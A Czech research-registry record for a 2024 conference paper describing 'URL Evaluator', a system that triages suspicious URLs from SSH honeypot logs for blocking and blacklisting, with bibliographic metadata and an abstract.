All

What are you looking for?

All
Projects
Results
Organizations

Quick search

  • Projects supported by TA ČR
  • Excellent projects
  • Projects with the highest public support
  • Current projects

Smart search

  • That is how I find a specific +word
  • That is how I leave the -word out of the results
  • “That is how I can find the whole phrase”
EN
ČeštinaEnglish

URL Evaluator: Semi-automatic evaluation of suspicious URLs from honeypots

The result's identifiers

  • Result code in IS VaVaI

    <a href="https://www.isvavai.cz/riv?ss=detail&h=RIV%2F63839172%3A_____%2F24%3A10133688" target="_blank" >RIV/63839172:_____/24:10133688 - isvavai.cz</a>

  • Result on the web

    <a href="https://dl.ifip.org/db/conf/cnsm/cnsm2024/1571071957.pdf" target="_blank" >https://dl.ifip.org/db/conf/cnsm/cnsm2024/1571071957.pdf</a>

  • DOI - Digital Object Identifier

    <a href="http://dx.doi.org/10.23919/CNSM62983.2024.10814604" target="_blank" >10.23919/CNSM62983.2024.10814604</a>

Alternative languages

  • Result language

    angličtina

  • Original language name

    URL Evaluator: Semi-automatic evaluation of suspicious URLs from honeypots

  • Original language description

    Botnets often rely on malicious URLs to distribute malware payloads over HTTP. Identifying these URLs is critical for network defense, as it enables the detection or blocking of access from within the network, thereby preventing potential malware infections. A promising approach for uncovering URLs used for malware distribution involves analyzing data from SSH honeypots. However, not every URL observed in a honeypot log is necessarily malicious. In this paper, we present the &quot;URL Evaluator&quot; system, which automates the extraction and analysis of suspicious URLs from SSH honeypot data. It employs a semi-automated evaluation process, which leverages multiple data sources and methods and escalates to human operators only when necessary. Confirmed malicious URLs are then used in a network monitoring system to detect any accesses to such URLs from within the defended network. Any such access is automatically reported to the responsible administrator or security team. Additionaly, the system contributes newly found malicious URLs to a large community blacklist. The paper describes the system architecture, key components, and its operational results.

  • Czech name

  • Czech description

Classification

  • Type

    D - Article in proceedings

  • CEP classification

  • OECD FORD branch

    10201 - Computer sciences, information science, bioinformathics (hardware development to be 2.2, social aspect to be 5.8)

Result continuities

  • Project

    <a href="/en/project/LM2023054" target="_blank" >LM2023054: e-Infrastructure CZ</a><br>

  • Continuities

    P - Projekt vyzkumu a vyvoje financovany z verejnych zdroju (s odkazem do CEP)

Others

  • Publication year

    2024

  • Confidentiality

    S - Úplné a pravdivé údaje o projektu nepodléhají ochraně podle zvláštních právních předpisů

Data specific for result type

  • Article name in the collection

    20th International Conference on Network and Service Management

  • ISBN

    978-3-903176-66-9

  • ISSN

    2165-963X

  • e-ISSN

  • Number of pages

    4

  • Pages from-to

  • Publisher name

    IFIP

  • Place of publication

    Prague, Czech Republic

  • Event location

    Prague, Czech Republic

  • Event date

    Oct 28, 2024

  • Type of event by nationality

    WRD - Celosvětová akce

  • UT code for WoS article

    001414325200072

Similar results(10)

Random-Forest-Based Analysis of URL PathsIP telephony Server Emulation for Monitoring and Analysis of Malicious Activity in VoIP NetworkAutomatic analysis of attack data from distributed honeypot network